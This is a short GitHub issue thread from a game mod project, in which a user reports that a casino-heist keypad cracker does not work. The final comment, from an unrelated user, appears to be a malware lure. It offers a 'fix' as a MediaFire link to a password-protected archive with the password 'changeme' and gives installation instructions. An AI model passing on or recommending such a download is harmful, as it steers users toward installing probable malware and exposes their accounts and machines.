### ISSUE TITLE
key pad cracker in casino heist doesn't Work 

### ISSUE THREAD

**Issue by TheGhost00786** [SilentSal0/Silent-Night#7]
Kaypad cracker doesn't Work when i press keypad crack in silent night in casino heist nothing happens

**Comment by SilentSalo** [comment]
What menu are you using? Also, would be better if we continue on discord - silentsalo.

**Comment by TheGhost00786** [comment]
> What menu are you using? Also, would be better if we continue on discord - silentsalo.

modest menu

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
